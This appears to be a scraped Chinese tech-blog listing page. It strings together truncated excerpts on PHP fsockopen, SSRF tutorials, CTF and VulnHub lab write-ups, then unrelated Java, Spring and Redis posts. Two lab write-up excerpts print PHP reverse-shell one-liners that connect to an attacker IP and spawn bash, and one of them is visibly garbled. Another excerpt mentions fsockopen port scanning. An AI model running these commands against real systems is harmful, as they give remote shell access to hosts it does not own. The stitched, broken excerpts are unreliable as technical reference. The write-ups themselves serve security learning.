- 初学ssrf(1)
晓幂
web安全安全网络安全
初学ssrf(1)一.什么是ssrf:SSRF,服务端请求伪造,是一种攻击者构造攻击连传给服务器,给服务端执行并发起请求造成安全问题漏洞,一般用来在外网探测或供给内网服务。1.相关函数和类:file_get_contents()//将整个文件或一个url所指向的文件读入一个字符串中(php伪协议中常用)readfile()//输出一个文件的内容fsockopen()//打开一个网络连接或者一个Un
- 开发安全之:Server-Side Request Forgery
irizhao
安全
Overview函数fsockopen()将使用资源URI的用户控制数据启动与第三方系统的网络连接。攻击者可以利用此漏洞代表应用程序服务器发送一个请求,因为此请求将自应用程序服务器内部IP地址发出。Details当攻击者可以影响应用程序服务器建立的网络连接时,将会发生Server-SideRequestForgery。网络连接源自于应用程序服务器内部IP地址,因此攻击者将可以使用此连接来避开网络控
- 开发安全之:Server-Side Request Forgery
irizhao
安全
Overview函数fsockopen()将使用资源URI的用户控制数据启动与第三方系统的网络连接。攻击者可以利用此漏洞代表应用程序服务器发送一个请求,因为此请求将自应用程序服务器内部IP地址发出。Details当攻击者可以影响应用程序服务器建立的网络连接时,将会发生Server-SideRequestForgery。网络连接源自于应用程序服务器内部IP地址,因此攻击者将可以使用此连接来避开网络控
- vulnhub靶机Chill_Hack
himobrinehacken
vulnhub网络安全web安全系统安全网络攻击模型安全
下载地址:ChillHack:1~VulnHub主机发现目标176端口扫描服务扫描直接去看web先扫一下有几个有点问题看着好像命令执行看来没错直接反弹shell还有还白名单?bash也不能用那就用php吧whoami|php-r'$sock=fsockopen("192.168.21.131",666);exec("bash&32>&3");'搞定接下来就是提权了有python吧shell弄一下刚
- php网站在服务器上邮件发送不了,在本地可以
懒得代码
phpphp邮箱
最近在做phpmailer发送邮件功能里发现了一个问题,网站程序在本地测试邮件可以正常发送到指定的邮箱。但是把代码放到空间上面,邮件发不了,提示发送出错!研究半天没有搞懂为什么……(高手勿喷)后来上网找了一下,有人说是服务器商因为安全原因把php的fsockopen函数给关闭了。于是按照网上的解决方法把fsockopen函数替换了,方法如下:首先找到phpmailer的class.stmp.php
- 分析日志命令
xiaopzi123123
网络服务器linux
grep-i"fsockopen"-R*|more搜索文件夹下的fsockopenfind./-typef|wc-l统计文件夹下有多文件crontab-e0grep'07/Sep'access_nginx.log|awk-F":"'{if($2>7&&$2="[07/Sep/2020:15:00:00"&&$4awk'{if($1=="113.111.211.224"){print$0}}'tem
- WEB系列(五)-----------SSRF/XXE/命令执行
weixinzjh
WEB安全
SSRFSSRF(server-siterequestfirery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。与CSRF不同的是发起请求的对象不同。成因:服务端提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤与限制。产生ssrf漏洞的函数file_get_content()fsockopen()curl_exec()XXEXMLDTDDTD声明类型内部声明外部声明DT
- PHP监本telnet到服务器并执行命令脚本,可以用来执行dubbo命令
人在码途
sock=fsockopen($host,$port);socket_set_timeout($this->sock,10,0);}functionclose(){if($this->sock)fclose($this->sock);$this->sock=NULL;}functionwrite($buffer){$buffer=str_replace(chr(255),chr(255).chr(
- php 监听redis,php监听redis key失效触发回调事件_后端开发
阿葱的葱白
php监听redis
php中使用fsockopen实现异步请求(代码示例)_后端开发php执行一段程序,有可能几毫秒就执行完毕,也有可能耗时较长。例如,用户下单这个事件,如果调用了些第三方服务进行发邮件、短信、推送等通知,可能导致前端一直在等待。订单超时、活动过期解决方案:php监听rediskey失效触发回调事件Redis的2.8.0版本之后可用,键空间消息(RedisKeyspaceNotifications),
- 云尘-Acid
双层小牛堡
渗透chromeandroid前端
vulhub的靶场直接开扫开始信息收集robots.txt啥都给我用上有一个解码看看访问不上学了别人的wp通过dirbustr跑选择字典开冲!但是真的巨慢!!!然后最后扫下来Challenge/Magic_Box/command.php发现了这个目录这不就ctf的ping的rce么直接执行命令看看这里如果我们需要反弹shell就需要通过bp的url编码;php-r'$sock=fsockopen(
- NSSCTF第8页(2)
呕...
android
[LitCTF2023]就当无事发生没有环境[MoeCTF2022]ezhtml在js代码找到了flag[HNCTF2022WEEK2]ez_ssrf题目描述说让我们访问index.php,看到了代码传入的data会base64解码,传参port和host,还有一个没见过的函数fsockopen查了一下fsockopen函数可以被滥用来触发SSRF攻击,这是因为该函数允许从远程服务器上读取数据并与
- [HNCTF 2022 WEEK2]ez_ssrf题目解析
狼丿王
java算法开发语言
这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察本题是需要我们去伪造一个ssrf的请求头去绕过题目开始给了我们信息让我们去访问index.phpfsockopen函数触发ssrffsockopen()函数建立与指定主机和端口的socket连接。然后,它将传入的base64编码的数据解码,并将数据写入到连接的socket中。通过了解知道fsockopen函数就要清楚有考察ssrf的意思,需
- php发送get、post请求的6种方法简明总结?
smallmww
PHPphp
这篇文章主要介绍php发送get、post请求的6种方法简明总结,分别为使用file_get_contents、fopen、fsockopen、curl来发送GET和POST请求,需要的朋友可以参考下方法1:用file_get_contents以get方式获取内容:方法2:用fopen打开url,以get方式获取内容:方法3:用file_get_contents函数,以post方式获取url'ba
- CTFHUB - SSRF
双层小牛堡
WEBSSRF
目录SSRF漏洞攻击对象攻击形式产生漏洞的函数file_get_contents()fsockopen()curl_exec()提高危害利用的伪协议filedictgopher内网访问伪协议读取文件端口扫描POST请求总结上传文件总结FastCGI协议CGI和FastCGI的区别FastCGI协议FastCGI和web服务器的交互过程PHP-FPM攻击原理实现RCE做题1.exp2.gopheru
- SSRF攻击(服务端请求伪造)
布满杂草的荆棘
常见的漏洞安全网络
1.SSRF(服务端请求伪造)原理概念:是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)原理:参数给变量未经过滤,使用了不安全的函数curl_init、file_get_contents、fsockopen,这三个函数支持过滤协议,通过过滤协议读对方的文
- 怎么实现PHP异步
宸风如苏
在开发中遇到过这样的问题(我是在支付宝回调的时候,处理的业务逻辑有点多),某段程序执行很慢,但是这又涉及到用户体验,这时候我们就会想如果我先返回给用户成功的提示,然后我在服务器上再去慢慢执行我的代码不就两全齐美了吗-----这就是我理解的异步。PHP是支持socket编程的,就是fsockopen函数,函数说明:fsockopen—打开一个网络连接或者一个Unix套接字连接fscokopen会返回
- web-ssrf
偷吃"游"的阿彪
前端
目录ssrf介绍以pikachu靶场为例curl访问外网链接利用file协议查看本地文件利用dict协议扫描内网主机开放端口file_get_content利用file协议查看本地文件:fsockopen()防御方式:ssrf介绍服务器端请求伪造,是一种由攻击者构造形成而由服务器端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。其目标是与服务器端相连的内部网络。以
- SSRF 漏洞学习实战
救命救敏
安全学习web安全
3x05SSRF漏洞学习实战文章目录3x05`SSRF`漏洞学习实战一.ssrf漏洞概念二.原理三.SSRF漏洞的危害四.漏洞检测点五.ssrf漏洞绕过六.ssrf漏洞的利用1.相关函数(1)`file_get_contents`(2)`fsockopen`(3)`curl_exec`2.相关协议七.pikachu靶场之ssrf七.ssrf防御补充知识一.ssrf漏洞概念ssrf(Server-S
- 【无标题】
里音日黑
知识网络安全
(1)相关的函数和类file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中(php伪协议中常用)readfile():输出一个文件的内容fsockopen():打开一个网络连接或者一个Unix套接字连接curl_init():初始化一个新的会话,返回一个cURL句柄,供curl_setopt(),curl_exec()和curl-exec():执行给定的cURL
- 无标题文章
超人又来了
fsockopen()函数的作用是可以用来打开一个socket连接,另一个函数pfsockopen()也有相似的功能,只不过后者是一个“持续”(persistent)的fsockopen()函数,它在脚本运行完之后并不立即断开。PHP异步:在PHP中使用fsockopencurl实现类似异步处理的功能https://segmentfault.com/a/1190000002982448你吃饭吃到一
- PHP上传文件结合socket完成
云松编程
PHPsocket上传文件php
利用fsockopen来上传文件以前我写过一篇关于socket通信原理的博文http://blog.51yip.com/php/673.html有兴趣的朋友可以看看,前面讲的那篇博文,socket的服务器和客户端都是要用php命令来运行的。平常我们上传文件是浏览本地文件,通过一个php程序将文件上传一个地方,这个时候我们用php命令来运行php程序就不方便了。这个时候我们可以用fsockopen来
- 记一次 CURL HTTP 500 错误经历
HiFeiz
PHP/Mysqlphp
事出经过APIPost,PHPCURL请求本地API接口始终报HTTP500,CURL和APIPost设置通过fd代理后请求却没有问题主要是PHP调试一直出错,fsockopen、curl、file_get_contents都一样解决过程wireshark无法抓本地包,遂放弃curl设置fiddler走代理后请求没有问题!!!!最后通过获取curl的请求头,发现多了个头Proxy-Connecti
- SSRF漏洞讲解
跳楼梯企鹅
安全web安全服务器
SSRF漏洞讲解一、初识SSRF漏洞1.定义2.产生原理3.会导致的危害4.常见产生SSRF的地方5.常见缺失函数二、SSRF漏洞利用1.函数(1)file_get_contents(2)fsockopen()(3)curl_exec()2.协议(1)file协议(2)http协议(3)dict协议(4)gopher协议三、绕过1.绕过方式(1)检查IP是否为内网IP(2)Host获取与DNS绕过
- php 怎么实现多线程,php 实现多线程
陈炳好
php怎么实现多线程
通过php的Socket方式实现php程序的多线程。php本身是不支持多线程的,那么如何在php中实现多线程呢?可以想一下,WEB服务器本身都是支持多线程的。每一个访问者,当访问WEB页面的时候,都将调用新的线程,通过这一点我们可以利用WEB服务器自身的线程来解决PHP不支持多线程的问题。下面给出通过fsockopen()建立socket连接,然后用用fputs()发送消息,来实现的PHP多线程类
- php扫描端口
CSeroad
php实现对指定IP进行端口扫描代码为IPportScantd{padding:10px;margin:10px;border-width:1pxsolid#eee;text-align:center;}span{color:red;}pleaseentertheIPaddress10){foreach($portas$key=>$value){$fp=@fsockopen($ip,$value,
- 细说——SSRF
lainwith
渗透测试渗透测试
目录什么是SSRF形成原因容易出现SSRF的地方SSRF的危害脑图SSRF相关函数和协议函数file_get_contents()fsockopen()curl_exec()协议漏洞检测常用绕过方式限制为http://www.xxx.com域名时(利用@)限制请求IP不为内网地址限制请求只为http协议利用[::]利用句号利用特殊地址利用协议利用上传利用Enclosedalphanumerics靶
- 网络编程--socket
机器不能学习
php内置函数只能够主动连接,无法进行监听等活动。函数包或fsockopen和pfsockopen,后者是长连接,persistent的缩写利用函数建立连接后,资源的传输获取可以用文件操作的几个函数。fgets()(读字符,用于读取正行或字符串)fread()(用于读取整块内容)fwrite()fclose()等PECL函数库函数函数库有强大的socket功能,包括监听端口,阻塞和非阻塞切换,多客
- PHP的一个完整SMTP类(解决当mail()遇上邮件服务器需要验证时的问题) [转]
nihilism
php技术邮件服务器phpfunctionheadercommandvariables
class.smtp.phpdebug=FALSE;$this->smtp_port=$smtp_port;$this->relay_host=$relay_host;$this->time_out=30;//isusedinfsockopen()#$this->auth=$auth;//auth$this->user=$user;$this->pass=$pass;#$this->host_na
- php 利用smtp封装类发送邮件
hxjcsdn
随笔
1.smtp封装类,二开注意名称不要与已有冲突还要注意位置放正确,比如我这里重命名为smtp_email.php,放在classes文件夹下debug=FALSE;$this->smtp_port=$smtp_port;$this->relay_host=$relay_host;$this->time_out=30;//isusedinfsockopen()#$this->auth=$auth;/
- php实现多线程
PHP学习与交流
PHPphp
PHP本身是不支持多线程的,我们可以通过php自身函数虚拟处理啊多线程。下面介绍三个函数来实现多进程。一、fsockopen,打开一个网络连接或者一个Unix套接字连接。其中stream_set_blocking()-为资源流设置阻塞或者阻塞模式*@title:PHP多线程类(Thread)*@version:1.0**PHP多线程应用示例:*require_once'thread.class.p
- java的(PO,VO,TO,BO,DAO,POJO)
Cb123456
VOTOBOPOJODAO
转:
http://www.cnblogs.com/yxnchinahlj/archive/2012/02/24/2366110.html
-------------------------------------------------------------------
O/R Mapping 是 Object Relational Mapping(对象关系映
- spring ioc原理(看完后大家可以自己写一个spring)
aijuans
spring
最近,买了本Spring入门书:spring In Action 。大致浏览了下感觉还不错。就是入门了点。Manning的书还是不错的,我虽然不像哪些只看Manning书的人那样专注于Manning,但怀着崇敬 的心情和激情通览了一遍。又一次接受了IOC 、DI、AOP等Spring核心概念。 先就IOC和DI谈一点我的看法。IO
- MyEclipse 2014中Customize Persperctive设置无效的解决方法
Kai_Ge
MyEclipse2014
高高兴兴下载个MyEclipse2014,发现工具条上多了个手机开发的按钮,心生不爽就想弄掉他!
结果发现Customize Persperctive失效!!
有说更新下就好了,可是国内Myeclipse访问不了,何谈更新...
so~这里提供了更新后的一下jar包,给大家使用!
1、将9个jar复制到myeclipse安装目录\plugins中
2、删除和这9个jar同包名但是版本号较
- SpringMvc上传
120153216
springMVC
@RequestMapping(value = WebUrlConstant.UPLOADFILE)
@ResponseBody
public Map<String, Object> uploadFile(HttpServletRequest request,HttpServletResponse httpresponse) {
try {
//
- Javascript----HTML DOM 事件
何必如此
JavaScripthtmlWeb
HTML DOM 事件允许Javascript在HTML文档元素中注册不同事件处理程序。
事件通常与函数结合使用,函数不会在事件发生前被执行!
注:DOM: 指明使用的 DOM 属性级别。
1.鼠标事件
属性  
- 动态绑定和删除onclick事件
357029540
JavaScriptjquery
因为对JQUERY和JS的动态绑定事件的不熟悉,今天花了好久的时间才把动态绑定和删除onclick事件搞定!现在分享下我的过程。
在我的查询页面,我将我的onclick事件绑定到了tr标签上同时传入当前行(this值)参数,这样可以在点击行上的任意地方时可以选中checkbox,但是在我的某一列上也有一个onclick事件是用于下载附件的,当
- HttpClient|HttpClient请求详解
7454103
apache应用服务器网络协议网络应用Security
HttpClient 是 Apache Jakarta Common 下的子项目,可以用来提供高效的、最新的、功能丰富的支持 HTTP 协议的客户端编程工具包,并且它支持 HTTP 协议最新的版本和建议。本文首先介绍 HTTPClient,然后根据作者实际工作经验给出了一些常见问题的解决方法。HTTP 协议可能是现在 Internet 上使用得最多、最重要的协议了,越来越多的 Java 应用程序需
- 递归 逐层统计树形结构数据
darkranger
数据结构
将集合递归获取树形结构:
/**
*
* 递归获取数据
* @param alist:所有分类
* @param subjname:对应统计的项目名称
* @param pk:对应项目主键
* @param reportList: 最后统计的结果集
* @param count:项目级别
*/
public void getReportVO(Arr
- 访问WEB-INF下使用frameset标签页面出错的原因
aijuans
struts2
<frameset rows="61,*,24" cols="*" framespacing="0" frameborder="no" border="0">
- MAVEN常用命令
avords
Maven库:
http://repo2.maven.org/maven2/
Maven依赖查询:
http://mvnrepository.com/
Maven常用命令: 1. 创建Maven的普通java项目: mvn archetype:create -DgroupId=packageName 
- PHP如果自带一个小型的web服务器就好了
houxinyou
apache应用服务器WebPHP脚本
最近单位用PHP做网站,感觉PHP挺好的,不过有一些地方不太习惯,比如,环境搭建。PHP本身就是一个网站后台脚本,但用PHP做程序时还要下载apache,配置起来也不太很方便,虽然有好多配置好的apache+php+mysq的环境,但用起来总是心里不太舒服,因为我要的只是一个开发环境,如果是真实的运行环境,下个apahe也无所谓,但只是一个开发环境,总有一种杀鸡用牛刀的感觉。如果php自己的程序中
- NoSQL数据库之Redis数据库管理(list类型)
bijian1013
redis数据库NoSQL
3.list类型及操作
List是一个链表结构,主要功能是push、pop、获取一个范围的所有值等等,操作key理解为链表的名字。Redis的list类型其实就是一个每个子元素都是string类型的双向链表。我们可以通过push、pop操作从链表的头部或者尾部添加删除元素,这样list既可以作为栈,又可以作为队列。
&nbs
- 谁在用Hadoop?
bingyingao
hadoop数据挖掘公司应用场景
Hadoop技术的应用已经十分广泛了,而我是最近才开始对它有所了解,它在大数据领域的出色表现也让我产生了兴趣。浏览了他的官网,其中有一个页面专门介绍目前世界上有哪些公司在用Hadoop,这些公司涵盖各行各业,不乏一些大公司如alibaba,ebay,amazon,google,facebook,adobe等,主要用于日志分析、数据挖掘、机器学习、构建索引、业务报表等场景,这更加激发了学习它的热情。
- 【Spark七十六】Spark计算结果存到MySQL
bit1129
mysql
package spark.examples.db
import java.sql.{PreparedStatement, Connection, DriverManager}
import com.mysql.jdbc.Driver
import org.apache.spark.{SparkContext, SparkConf}
object SparkMySQLInteg
- Scala: JVM上的函数编程
bookjovi
scalaerlanghaskell
说Scala是JVM上的函数编程一点也不为过,Scala把面向对象和函数型编程这两种主流编程范式结合了起来,对于熟悉各种编程范式的人而言Scala并没有带来太多革新的编程思想,scala主要的有点在于Java庞大的package优势,这样也就弥补了JVM平台上函数型编程的缺失,MS家.net上已经有了F#,JVM怎么能不跟上呢?
对本人而言
- jar打成exe
bro_feng
java jar exe
今天要把jar包打成exe,jsmooth和exe4j都用了。
遇见几个问题。记录一下。
两个软件都很好使,网上都有图片教程,都挺不错。
首先肯定是要用自己的jre的,不然不能通用,其次别忘了把需要的lib放到classPath中。
困扰我很久的一个问题是,我自己打包成功后,在一个同事的没有装jdk的电脑上运行,就是不行,报错jvm.dll为无效的windows映像,如截图
最后发现
- 读《研磨设计模式》-代码笔记-策略模式-Strategy
bylijinnan
java设计模式
声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/
/*
策略模式定义了一系列的算法,并将每一个算法封装起来,而且使它们还可以相互替换。策略模式让算法独立于使用它的客户而独立变化
简单理解:
1、将不同的策略提炼出一个共同接口。这是容易的,因为不同的策略,只是算法不同,需要传递的参数
- cmd命令值cvfM命令
chenyu19891124
cmd
cmd命令还真是强大啊。今天发现jar -cvfM aa.rar @aaalist 就这行命令可以根据aaalist取出相应的文件
例如:
在d:\workspace\prpall\test.java 有这样一个文件,现在想要将这个文件打成一个包。运行如下命令即可比如在d:\wor
- OpenJWeb(1.8) Java Web应用快速开发平台
comsci
java框架Web项目管理企业应用
OpenJWeb(1.8) Java Web应用快速开发平台的作者是我们技术联盟的成员,他最近推出了新版本的快速应用开发平台 OpenJWeb(1.8),我帮他做做宣传
OpenJWeb快速开发平台以快速开发为核心,整合先进的java 开源框架,本着自主开发+应用集成相结合的原则,旨在为政府、企事业单位、软件公司等平台用户提供一个架构透
- Python 报错:IndentationError: unexpected indent
daizj
pythontab空格缩进
IndentationError: unexpected indent 是缩进的问题,也有可能是tab和空格混用啦
Python开发者有意让违反了缩进规则的程序不能通过编译,以此来强制程序员养成良好的编程习惯。并且在Python语言里,缩进而非花括号或者某种关键字,被用于表示语句块的开始和退出。增加缩进表示语句块的开
- HttpClient 超时设置
dongwei_6688
httpclient
HttpClient中的超时设置包含两个部分:
1. 建立连接超时,是指在httpclient客户端和服务器端建立连接过程中允许的最大等待时间
2. 读取数据超时,是指在建立连接后,等待读取服务器端的响应数据时允许的最大等待时间
在HttpClient 4.x中如下设置:
HttpClient httpclient = new DefaultHttpC
- 小鱼与波浪
dcj3sjt126com
一条小鱼游出水面看蓝天,偶然间遇到了波浪。 小鱼便与波浪在海面上游戏,随着波浪上下起伏、汹涌前进。 小鱼在波浪里兴奋得大叫:“你每天都过着这么刺激的生活吗?简直太棒了。” 波浪说:“岂只每天过这样的生活,几乎每一刻都这么刺激!还有更刺激的,要有潮汐变化,或者狂风暴雨,那才是兴奋得心脏都会跳出来。” 小鱼说:“真希望我也能变成一个波浪,每天随着风雨、潮汐流动,不知道有多么好!” 很快,小鱼
- Error Code: 1175 You are using safe update mode and you tried to update a table
dcj3sjt126com
mysql
快速高效用:SET SQL_SAFE_UPDATES = 0;下面的就不要看了!
今日用MySQL Workbench进行数据库的管理更新时,执行一个更新的语句碰到以下错误提示:
Error Code: 1175
You are using safe update mode and you tried to update a table without a WHERE that
- 枚举类型详细介绍及方法定义
gaomysion
enumjavaee
转发
http://developer.51cto.com/art/201107/275031.htm
枚举其实就是一种类型,跟int, char 这种差不多,就是定义变量时限制输入的,你只能够赋enum里面规定的值。建议大家可以看看,这两篇文章,《java枚举类型入门》和《C++的中的结构体和枚举》,供大家参考。
枚举类型是JDK5.0的新特征。Sun引进了一个全新的关键字enum
- Merge Sorted Array
hcx2013
array
Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one sorted array.
Note:You may assume that nums1 has enough space (size that is
- Expression Language 3.0新特性
jinnianshilongnian
el 3.0
Expression Language 3.0表达式语言规范最终版从2013-4-29发布到现在已经非常久的时间了;目前如Tomcat 8、Jetty 9、GlasshFish 4已经支持EL 3.0。新特性包括:如字符串拼接操作符、赋值、分号操作符、对象方法调用、Lambda表达式、静态字段/方法调用、构造器调用、Java8集合操作。目前Glassfish 4/Jetty实现最好,对大多数新特性
- 超越算法来看待个性化推荐
liyonghui160com
超越算法来看待个性化推荐
一提到个性化推荐,大家一般会想到协同过滤、文本相似等推荐算法,或是更高阶的模型推荐算法,百度的张栋说过,推荐40%取决于UI、30%取决于数据、20%取决于背景知识,虽然本人不是很认同这种比例,但推荐系统中,推荐算法起的作用起的作用是非常有限的。
就像任何
- 写给Javascript初学者的小小建议
pda158
JavaScript
一般初学JavaScript的时候最头痛的就是浏览器兼容问题。在Firefox下面好好的代码放到IE就不能显示了,又或者是在IE能正常显示的代码在firefox又报错了。 如果你正初学JavaScript并有着一样的处境的话建议你:初学JavaScript的时候无视DOM和BOM的兼容性,将更多的时间花在 了解语言本身(ECMAScript)。只在特定浏览器编写代码(Chrome/Fi
- Java 枚举
ShihLei
javaenum枚举
注:文章内容大量借鉴使用网上的资料,可惜没有记录参考地址,只能再传对作者说声抱歉并表示感谢!
一 基础 1)语法
枚举类型只能有私有构造器(这样做可以保证客户代码没有办法新建一个enum的实例)
枚举实例必须最先定义
2)特性
&nb
- Java SE 6 HotSpot虚拟机的垃圾回收机制
uuhorse
javaHotSpotGC垃圾回收VM
官方资料,关于Java SE 6 HotSpot虚拟机的garbage Collection,非常全,英文。
http://www.oracle.com/technetwork/java/javase/gc-tuning-6-140523.html
Java SE 6 HotSpot[tm] Virtual Machine Garbage Collection Tuning
&